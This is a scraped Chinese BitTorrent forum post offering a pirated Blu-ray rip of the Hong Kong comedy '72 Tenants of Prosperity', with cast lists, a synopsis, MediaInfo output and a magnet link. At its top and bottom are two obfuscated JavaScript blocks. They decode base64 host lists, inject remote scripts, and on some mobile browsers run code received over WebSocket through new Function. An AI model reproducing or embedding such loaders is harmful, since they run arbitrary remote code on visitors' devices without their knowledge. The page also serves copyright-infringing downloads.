72家租客[国粤语配音/中文字幕].72.Tenants.of.Prosperity.2010.1080p.BluRay.x265.10bit.DTS.2Audio-bt9527.cc 5.05GB

版主小s 16天前 175

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 72家租客 / 72家房客 / 七十二家租客 / 72 Tenants of Prosperity

◎年 代 2010

◎产 地 中国香港

◎类 别 喜剧

◎语 言 粤语

◎上映日期 2010-02-11

◎IMDb链接 https://www.imdb.com/title/tt1602474/

◎豆瓣评分 6.6/10 (75209人评价)

◎豆瓣链接 https://movie.douban.com/subject/4062922/

◎片 长 99 分钟

◎导 演 曾志伟 Eric Tsang (id:1002862)

叶念琛 Patrick Kong (id:1274344)

钟澍佳 Chung Shu Kai (id:1313626)

◎编 剧 叶念琛 Patrick Kong (id:1274344)

曾志伟 Eric Tsang (id:1002862)

叶锦鸿 Kam-Hung Yip (id:1301487)

叶天成 Tin-Shing Yip (id:1306719)

◎演 员 张学友 Jacky Cheung (id:1012563)

曾志伟 Eric Tsang (id:1002862)

袁咏仪 Anita Yuen (id:1050693)

黄宗泽 Bosco Wong (id:1038569)

邓丽欣 Stephy Tang (id:1028496)

钟嘉欣 Linda Chung Ka-Yan (id:1257558)

王祖蓝 Cho-lam Wong (id:1274238)

梁天 Tian Liang (id:1222588)

刘美君 Mei-Guan Lau (id:1038329)

徐子珊 Kate Tsui (id:1018555)

佘诗曼 Charmaine Sheh (id:1019718)

林家栋 Ka Tung Lam (id:1050329)

许志安 Andy Hui Chi-On (id:1107142)

陈慧琳 Kelly Chen (id:1050335)

张卫健 Dicky Cheung (id:1005575)

林峯 Raymond Lam (id:1037562)

廖碧儿 Bernice Jan Liu (id:1215093)

郑欣宜 Joyce Cheng (id:1007512)

黎耀祥 Wayne Lai (id:1274440)

谢天华 Michael Tse (id:1010833)

陈百祥 Pak-cheung Chan (id:1070608)

刘以达 Tats Lau (id:1034328)

陈法拉 Fala Chen (id:1033379)

李颖芝 Kiara Li (id:1319354)

陈茵媺 Aimee Chan (id:1275701)

菁玮 Luvin Ho (id:1320854)

梁嘉琪 Kaki Leung (id:1322357)

郑诗君 Sze-kwan Cheng (id:1322710)

陈爽 Sherry chan (id:1357345)

王淑玲 Vanko Wong (id:1357015)

祝文君 Chuk Man Kwan (id:1345892)

卢大伟 David Lo (id:1325802)

张嘉儿 Kayi Cheung (id:1355198)

薛家燕 Nancy Sit (id:1312944)

魏焌皓 Nathan Ngai (id:1323404)

陈自瑶 Yoyo Chen (id:1052535)

洪天明 Timmy Hung Tin-Ming (id:1314773)

谷峰 Feng Ku (id:1054239)

关宝慧 Emily Kwan (id:1316564)

王青 Ching Wong (id:1275150)

招石文 Shek-Man Chiu (id:1345872)

林敏骢 Man-Chung Lam (id:1289295)

谭真一 Jan-yut Tam (id:1321778)

张韦怡 Gogo Cheung (id:1400322)

黎振烨 Chun Ye Lai (id:1400323)

王德基 Kedar Wong (id:1407859)

叶晨曦 Senhai Yip (id:1421210)

胡枫 Fung Woo (id:1313733)

高钧贤 Matthew Kwan Yin Ko (id:1314484)

马德钟 Joe Tak-Chung Ma (id:1218349)

郭政鸿 Jing-hung Kwok (id:1044122)

汤盈盈 Angela Tong (id:1150279)

欧锦棠 Stephen Au (id:1275712)

钱小豪 Siu-hou Chin (id:1005415)

戚美珍 Jaime Mei Chun Chik (id:1015346)

向佐 Jacky Heung (id:1275971)

阮小仪 Kitty Yuen (id:1219964)

玛利亚 Maria Cordero (id:1281277)

周家蔚 Janet Chow (id:1369528)

郑咏谦 Moses Wing-Him Cheng (id:1459957)

黎彼得 Peter Lai (id:1289269)

邵音音 Yin-Yin Shaw (id:1297367)

蒋志光 Chi-Kwong Cheung (id:1315056)

狄易达 Tat Dik (id:1316282)

泳儿 Vincy Chan (id:1316323)

侧田 Justin Lo (id:1313646)

高海宁 Samantha Ko (id:1316094)

陆永 Wing-kuen Luk (id:1275662)

马蹄露 Celine Ma Tai-Lau (id:1318726)

朱咪咪 Mimi Chu (id:1275715)

洪智杰 Osman Hung Chi-Kit (id:1316709)

小肥 Terence Siufay (id:1316260)

钟舒漫 Sherman Chung (id:1274529)

黄智贤 Chi-yin Wong (id:1315071)

曹永廉 Wing Lim Cho (id:1315068)

滕丽名 Joyce Tang (id:1275168)

鲁振顺 Chun-shun Lo (id:1315173)

陈锦鸿 Sunny Chan (id:1275332)

郑嘉颖 Kevin Cheng (id:1274666)

梁靖琪 Toby Leung (id:1252695)

李颖芝 Wendy Lee (id:1319355)

邵剑秋 Kim-Chau Shiu (id:1413263)

乐易玲 Virginia Lok (id:1403148)

张东亮 Tony Cheung (id:1280625)

李栋全 Wenders Li (id:1275162)

刘俐 Kibby Lau (id:1333238)

宁进 Coson Leung (id:1357583)

李豪 Leo Lee (id:1357589)

◎标 签 喜剧 / 香港电影 / 香港 / 七十二家租客 / TVB / 张学友 / 2010 / 曾志伟

◎简 介

香港旺角的西洋菜街,商铺林立,游人络绎不绝。哈公(曾志伟 饰)和石坚(张学友 饰)的手机店隔街相望,两家为抢生意各出奇招,互不相让。其实二人多年前本为好友,当年二人智斗包租婆的故事至今仍传为佳话,结果最后却为争小桃红(袁咏仪 饰)反目成仇。如今,已为哈嫂的小桃红和哈公相亲相爱,但在心底对曾经的好朋友石坚也仍关爱有加。两家的儿女们私下也有所往来,并逐渐互生好感。大业主租金要翻三倍,商户们为此伤透脑筋。频频有神秘人从高处扔硫酸水,生活在小街的人们陷入恐慌。为了维护生存的权益,为了还西洋菜街以安宁,商户们决定团结一致,共同捍为自己的家园……

本片由邵氏和TVB合作拍摄,因集结两岸三地的100多位明星参演,所以有港版《建国大业》之称。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 273560540264093871457304264540393888791 (0xCDCDD7F6CEC65C17ADF3AB1CC8D0DC17)

  4. Complete name : 72.Tena[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.05 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate : 7 372 kb/s

  10. Movie name : 72 tenants of prosperity - Blu-ray?

  11. Encoded date : UTC 2021-11-14 11:40:15

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 38 min

  23. Bit rate : 5 153 kb/s

  24. Width : 1 916 pixels

  25. Height : 818 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.137

  33. Stream size : 3.53 GiB (70%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=21.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x818 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 38 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.03 GiB (20%)

  53. Title : Cantonese

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. ID in the original source medium : 4354 (0x1102)

  60. Format : AC-3

  61. Format/Info : Audio Coding 3

  62. Commercial name : Dolby Digital

  63. Codec ID : A_AC3

  64. Duration : 1 h 38 min

  65. Bit rate mode : Constant

  66. Bit rate : 640 kb/s

  67. Channel(s) : 6 channels

  68. Channel layout : L R C LFE Ls Rs

  69. Sampling rate : 48.0 kHz

  70. Frame rate : 31.250 FPS (1536 SPF)

  71. Compression mode : Lossy

  72. Delay relative to video : 2 s 0 ms

  73. Stream size : 449 MiB (9%)

  74. Title : Mandarin

  75. Language : Chinese

  76. Service kind : Complete Main

  77. Default : No

  78. Forced : No

  79. Original source medium : Blu-ray


  80. Text #1

  81. ID : 4

  82. ID in the original source medium : 4609 (0x1201)

  83. Format : PGS

  84. Muxing mode : zlib

  85. Codec ID : S_HDMV/PGS

  86. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration : 1 h 34 min

  88. Bit rate : 62.5 kb/s

  89. Count of elements : 3973

  90. Stream size : 42.2 MiB (1%)

  91. Title : chs

  92. Language : Chinese

  93. Default : Yes

  94. Forced : No

  95. Original source medium : Blu-ray


  96. Text #2

  97. ID : 5

  98. ID in the original source medium : 4608 (0x1200)

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 34 min

  104. Bit rate : 69.1 kb/s

  105. Count of elements : 3973

  106. Stream size : 46.6 MiB (1%)

  107. Title : cht

  108. Language : Chinese

  109. Default : No

  110. Forced : No

  111. Original source medium : Blu-ray


  112. Text #3

  113. ID : 6

  114. ID in the original source medium : 4610 (0x1202)

  115. Format : PGS

  116. Muxing mode : zlib

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 34 min

  120. Bit rate : 61.5 kb/s

  121. Count of elements : 3973

  122. Stream size : 41.5 MiB (1%)

  123. Title : eng

  124. Language : English

  125. Default : No

  126. Forced : No

  127. Original source medium : Blu-ray


  128. Menu

  129. 00:00:00.000 : en:Chapter 01

  130. 00:04:51.750 : en:Chapter 02

  131. 00:07:59.416 : en:Chapter 03

  132. 00:09:47.791 : en:Chapter 04

  133. 00:13:07.416 : en:Chapter 05

  134. 00:17:22.041 : en:Chapter 06

  135. 00:22:04.500 : en:Chapter 07

  136. 00:25:50.500 : en:Chapter 08

  137. 00:29:56.958 : en:Chapter 09

  138. 00:34:45.333 : en:Chapter 10

  139. 00:39:50.291 : en:Chapter 11

  140. 00:45:49.541 : en:Chapter 12

  141. 00:50:16.416 : en:Chapter 13

  142. 00:54:51.708 : en:Chapter 14

  143. 01:00:23.291 : en:Chapter 15

  144. 01:03:11.000 : en:Chapter 16

  145. 01:06:22.416 : en:Chapter 17

  146. 01:13:33.208 : en:Chapter 18

  147. 01:21:02.291 : en:Chapter 19

  148. 01:25:50.541 : en:Chapter 20

  149. 01:30:42.041 : en:Chapter 21


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:9C87573DF059F6085DA7207F7E13BD90A53A5F7A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};